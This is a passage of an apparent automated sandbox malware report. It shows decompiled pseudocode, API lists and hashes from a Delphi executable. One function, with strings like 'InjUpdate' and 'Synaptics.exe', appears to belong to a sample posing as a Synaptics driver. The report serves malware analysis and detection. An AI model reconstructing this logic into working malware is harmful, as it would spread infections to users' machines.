				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x0
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x0
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				E00445F34();
				 *0x49eb18 = E00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                                                                                                                                                                                            0x00446339
                                                                                                                                                                                                                            0x0044633c
                                                                                                                                                                                                                            0x00446341
                                                                                                                                                                                                                            0x00446342
                                                                                                                                                                                                                            0x00446347
                                                                                                                                                                                                                            0x0044634a
                                                                                                                                                                                                                            0x00446356
                                                                                                                                                                                                                            0x00446359
                                                                                                                                                                                                                            0x00446367
                                                                                                                                                                                                                            0x00446374
                                                                                                                                                                                                                            0x00446379
                                                                                                                                                                                                                            0x00446384
                                                                                                                                                                                                                            0x00446389
                                                                                                                                                                                                                            0x00446393
                                                                                                                                                                                                                            0x00446398
                                                                                                                                                                                                                            0x0044639b
                                                                                                                                                                                                                            0x004463a4
                                                                                                                                                                                                                            0x004463a7
                                                                                                                                                                                                                            0x004463b8
                                                                                                                                                                                                                            0x004463c5
                                                                                                                                                                                                                            0x004463ca
                                                                                                                                                                                                                            0x004463da
                                                                                                                                                                                                                            0x004463e0
                                                                                                                                                                                                                            0x004463f0
                                                                                                                                                                                                                            0x00446401
                                                                                                                                                                                                                            0x00446406
                                                                                                                                                                                                                            0x00446417
                                                                                                                                                                                                                            0x00446425
                                                                                                                                                                                                                            0x0044642a
                                                                                                                                                                                                                            0x00446430
                                                                                                                                                                                                                            0x0044643b
                                                                                                                                                                                                                            0x00446440
                                                                                                                                                                                                                            0x00446446
                                                                                                                                                                                                                            0x00446448
                                                                                                                                                                                                                            0x00446451
                                                                                                                                                                                                                            0x00446460
                                                                                                                                                                                                                            0x00446465
                                                                                                                                                                                                                            0x00446474
                                                                                                                                                                                                                            0x00446478
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x00446485
                                                                                                                                                                                                                            0x0044648c
                                                                                                                                                                                                                            0x0044648f
                                                                                                                                                                                                                            0x00446492
                                                                                                                                                                                                                            0x0044649a
                                                                                                                                                                                                                            0x004464a7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                              • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                              • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                              • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                              • Part of subcall function 00457FC8: 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                                                                                                                                                                                              • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                              • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                              • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                              • Part of subcall function 004590AC: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00459216
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                                                            • API String ID: 2159221912-974380857
                                                                                                                                                                                                                            • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                                                                                                                                                                                            • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043E6BC Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 306 43e6fe-43e703 302->306 304 43e78f-43e79a 303->304 305 43e79c-43e79e 303->305 304->305 307 43e7cd-43e7ea call 43e88c 304->307 308 43e7a0-43e7a8 UnregisterClassA 305->308 309 43e7ad-43e7c6 RegisterClassA 305->309 310 43e705-43e709 306->310 311 43e728-43e763 call 406a70 call 40d180 call 404378 306->311 319 43e7f1-43e804 GetWindowLongA 307->319 320 43e7ec call 40e79c 307->320 308->309 309->307 314 43e7c8 call 40e79c 309->314 310->311 313 43e70b-43e71a call 403d78 310->313 311->303 313->311 327 43e71c-43e726 call 441704 313->327 314->307 324 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 319->324 325 43e806-43e816 GetWindowLongA 319->325 320->319 339 43e853-43e857 324->339 325->324 329 43e818-43e822 SetWindowLongA 325->329 327->303 329->324 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43e87d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00437D70;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E79C(_t94, _t95, _t109, _t111);
						}
					}
					 *0x49bc20 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E79C(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00441A14(_t111);
					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403DE8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x43e884);
					return E004049C0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x49dc4c; // 0x422f30
						E00406A70(_t86,  &_v196);
						_t95 = _v196;
						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00404378();
					} else {
						_t108 =  *0x437498; // 0x4374e4
						if(E00403D78(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00441704(_t94);
					}
					goto L7;
				}
			}




















                                                                                                                                                                                                                            0x0043e6bc
                                                                                                                                                                                                                            0x0043e6bc
                                                                                                                                                                                                                            0x0043e6c5
                                                                                                                                                                                                                            0x0043e6c9
                                                                                                                                                                                                                            0x0043e6cf
                                                                                                                                                                                                                            0x0043e6d3
                                                                                                                                                                                                                            0x0043e6d4
                                                                                                                                                                                                                            0x0043e6d9
                                                                                                                                                                                                                            0x0043e6dc
                                                                                                                                                                                                                            0x0043e6e7
                                                                                                                                                                                                                            0x0043e6e9
                                                                                                                                                                                                                            0x0043e6f3
                                                                                                                                                                                                                            0x0043e768
                                                                                                                                                                                                                            0x0043e76b
                                                                                                                                                                                                                            0x0043e780
                                                                                                                                                                                                                            0x0043e788
                                                                                                                                                                                                                            0x0043e78a
                                                                                                                                                                                                                            0x0043e78d
                                                                                                                                                                                                                            0x0043e79e
                                                                                                                                                                                                                            0x0043e7a8
                                                                                                                                                                                                                            0x0043e7a8
                                                                                                                                                                                                                            0x0043e7ad
                                                                                                                                                                                                                            0x0043e7b7
                                                                                                                                                                                                                            0x0043e7c6
                                                                                                                                                                                                                            0x0043e7c8
                                                                                                                                                                                                                            0x0043e7c8
                                                                                                                                                                                                                            0x0043e7c6
                                                                                                                                                                                                                            0x0043e7cd
                                                                                                                                                                                                                            0x0043e7db
                                                                                                                                                                                                                            0x0043e7dd
                                                                                                                                                                                                                            0x0043e7ea
                                                                                                                                                                                                                            0x0043e7ec
                                                                                                                                                                                                                            0x0043e7ec
                                                                                                                                                                                                                            0x0043e804
                                                                                                                                                                                                                            0x0043e822
                                                                                                                                                                                                                            0x0043e822
                                                                                                                                                                                                                            0x0043e82a
                                                                                                                                                                                                                            0x0043e831
                                                                                                                                                                                                                            0x0043e836
                                                                                                                                                                                                                            0x0043e84e
                                                                                                                                                                                                                            0x0043e853
                                                                                                                                                                                                                            0x0043e857
                                                                                                                                                                                                                            0x0043e85f
                                                                                                                                                                                                                            0x0043e85f
                                                                                                                                                                                                                            0x0043e866
                                                                                                                                                                                                                            0x0043e869
                                                                                                                                                                                                                            0x0043e86c
                                                                                                                                                                                                                            0x0043e87c
                                                                                                                                                                                                                            0x0043e6fe
                                                                                                                                                                                                                            0x0043e6fe
                                                                                                                                                                                                                            0x0043e703
                                                                                                                                                                                                                            0x0043e728
                                                                                                                                                                                                                            0x0043e72b
                                                                                                                                                                                                                            0x0043e731
                                                                                                                                                                                                                            0x0043e747
                                                                                                                                                                                                                            0x0043e74c
                                                                                                                                                                                                                            0x0043e751
                                                                                                                                                                                                                            0x0043e75e
                                                                                                                                                                                                                            0x0043e763
                                                                                                                                                                                                                            0x0043e70b
                                                                                                                                                                                                                            0x0043e70d
                                                                                                                                                                                                                            0x0043e71a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043e723
                                                                                                                                                                                                                            0x0043e723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043e703

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                                                                                                            • String ID: 0/B$@$tC
                                                                                                                                                                                                                            • API String ID: 717780171-775952512
                                                                                                                                                                                                                            • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                                                                                                                                                                                            • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401B60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 361 401b60-401b6b 362 401b71-401b86 361->362 363 401c3d-401c3f 361->363 364 401b92-401bb1 LocalFree 362->364 365 401b88-401b8d RtlEnterCriticalSection 362->365 366 401bc5-401bcb 364->366 365->364 367 401bb3-401bc3 VirtualFree 366->367 368 401bcd-401bf2 call 401460 * 3 366->368 367->366 375 401bf4-401c09 LocalFree 368->375 376 401c0b-401c1f 368->376 375->375 375->376 378 401c21-401c26 RtlLeaveCriticalSection 376->378 379 401c2b-401c35 RtlDeleteCriticalSection 376->379 378->379
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00401B60() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x49e5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401C36);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L004013F8();
					}
					 *0x49e5c4 = 0;
					_t3 =  *0x49e624; // 0x0
					LocalFree(_t3);
					 *0x49e624 = 0;
					_t19 =  *0x49e5ec; // 0x49e5ec
					while(_t19 != 0x49e5ec) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t19 =  *_t19;
					}
					E00401460(0x49e5ec);
					E00401460(0x49e5fc);
					E00401460(0x49e628);
					_t14 =  *0x49e5e4; // 0x0
					while(_t14 != 0) {
						 *0x49e5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e5e4; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c3d);
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L00401400();
					}
					_push(0x49e5cc);
					L00401408();
					return 0;
				}
			}










                                                                                                                                                                                                                            0x00401b61
                                                                                                                                                                                                                            0x00401b6b
                                                                                                                                                                                                                            0x00401c3f
                                                                                                                                                                                                                            0x00401b71
                                                                                                                                                                                                                            0x00401b73
                                                                                                                                                                                                                            0x00401b74
                                                                                                                                                                                                                            0x00401b79
                                                                                                                                                                                                                            0x00401b7c
                                                                                                                                                                                                                            0x00401b86
                                                                                                                                                                                                                            0x00401b88
                                                                                                                                                                                                                            0x00401b8d
                                                                                                                                                                                                                            0x00401b8d
                                                                                                                                                                                                                            0x00401b92
                                                                                                                                                                                                                            0x00401b99
                                                                                                                                                                                                                            0x00401b9f
                                                                                                                                                                                                                            0x00401ba6
                                                                                                                                                                                                                            0x00401bab
                                                                                                                                                                                                                            0x00401bc5
                                                                                                                                                                                                                            0x00401bba
                                                                                                                                                                                                                            0x00401bbe
                                                                                                                                                                                                                            0x00401bc3
                                                                                                                                                                                                                            0x00401bc3
                                                                                                                                                                                                                            0x00401bd2
                                                                                                                                                                                                                            0x00401bdc
                                                                                                                                                                                                                            0x00401be6
                                                                                                                                                                                                                            0x00401beb
                                                                                                                                                                                                                            0x00401bf2
                                                                                                                                                                                                                            0x00401bf6
                                                                                                                                                                                                                            0x00401bfd
                                                                                                                                                                                                                            0x00401c02
                                                                                                                                                                                                                            0x00401c07
                                                                                                                                                                                                                            0x00401c0d
                                                                                                                                                                                                                            0x00401c10
                                                                                                                                                                                                                            0x00401c13
                                                                                                                                                                                                                            0x00401c1f
                                                                                                                                                                                                                            0x00401c21
                                                                                                                                                                                                                            0x00401c26
                                                                                                                                                                                                                            0x00401c26
                                                                                                                                                                                                                            0x00401c2b
                                                                                                                                                                                                                            0x00401c30
                                                                                                                                                                                                                            0x00401c35
                                                                                                                                                                                                                            0x00401c35

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                                                                                                                                                                                            • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                            • String ID: (I$I
                                                                                                                                                                                                                            • API String ID: 3782394904-2351459270
                                                                                                                                                                                                                            • Opcode ID: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                                                            • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				char _t33;
				intOrPtr _t38;
				void* _t39;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x49a5f6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x0
				_t97 = _t29; // executed
				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
				 *0x49f149 = _t33;
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x0, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124); // executed
						E00498F04(_t92, _t123, _t124); // executed
						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
						if(_t48 == 0) {
							_t49 =  *0x49f1b0; // 0x0
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x0
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x0
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x0
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x0
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x0
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x0
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98);
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
							E00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124); // executed
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x0
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x0
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					E00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}
































                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e0
                                                                                                                                                                                                                            0x0049a3e5
                                                                                                                                                                                                                            0x0049a3e6
                                                                                                                                                                                                                            0x0049a3e7
                                                                                                                                                                                                                            0x0049a3e8
                                                                                                                                                                                                                            0x0049a3e9
                                                                                                                                                                                                                            0x0049a3ea
                                                                                                                                                                                                                            0x0049a3eb
                                                                                                                                                                                                                            0x0049a3ef
                                                                                                                                                                                                                            0x0049a3f0
                                                                                                                                                                                                                            0x0049a3f5
